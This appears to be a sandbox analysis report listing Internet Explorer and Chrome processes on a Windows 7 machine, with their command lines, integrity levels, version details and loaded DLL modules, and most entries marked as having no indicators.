"C:\Program Files\Internet Explorer\iexplore.exe"
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\cryptbase.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ieui.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\url.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msfeeds.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mlang.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\tquery.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\secur32.dll

PID
1488
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3404 CREDAT:71937
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mlang.dll
c:\windows\system32\uxtheme.dll
c:\program files\java\jre1.8.0_92\bin\ssv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\progra~1\micros~1\office14\urlredir.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\progra~1\micros~1\office14\msohev.dll
c:\program files\java\jre1.8.0_92\bin\jp2ssv.dll
c:\program files\java\jre1.8.0_92\bin\msvcr100.dll
c:\program files\java\jre1.8.0_92\bin\deploy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\winmm.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\wship6.dll
c:\windows\system32\audioses.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\credssp.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\qagentrt.dll
c:\windows\system32\fveui.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\netutils.dll
c:\windows\system32\duser.dll
c:\windows\system32\xmllite.dll

PID
3684
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\credui.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\audioses.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\wpc.dll
c:\windows\system32\samlib.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\winsta.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\installer\{90140000-003d-0000-0000-0000000ff1ce}\wordicon.exe
c:\windows\system32\mssprxy.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\winshfhc.dll
c:\windows\system32\wdscore.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\devrtl.dll
c:\windows\system32\mpr.dll

PID
2452
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6dbf00b0,0x6dbf00c0,0x6dbf00cc
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
3884
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3696 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_watcher.dll

PID
3120
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=2AFD1E441E6216981DCCF3B51A8AB86C --mojo-platform-channel-handle=888 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\mf.dll
c:\windows\system32\atl.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\evr.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\slc.dll
c:\windows\system32\sqmapi.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\dxva2.dll
c:\program files\google\chrome\application\68.0.3440.106\d3dcompiler_47.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libglesv2.dll
c:\program files\google\chrome\application\68.0.3440.106\swiftshader\libegl.dll

PID
2580
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --service-pipe-token=A95F076E50B588126E142A7CBAF4F0B6 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=A95F076E50B588126E142A7CBAF4F0B6 --renderer-client-id=5 --mojo-platform-channel-handle=1904 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
1932
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --service-pipe-token=029E925BF38D01BB8511CC5EAA6E4D79 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=029E925BF38D01BB8511CC5EAA6E4D79 --renderer-client-id=3 --mojo-platform-channel-handle=2036 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3712
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=D7BB84F8B65F0815736D68575397D9A7 --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=D7BB84F8B65F0815736D68575397D9A7 --renderer-client-id=6 --mojo-platform-channel-handle=3584 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3732
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=916,15861722945708167285,6705186899220858722,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=482636049F0973B65EF94309A4B4122E --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=482636049F0973B65EF94309A4B4122E --renderer-client-id=7 --mojo-platform-channel-handle=3792 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2584
CMD
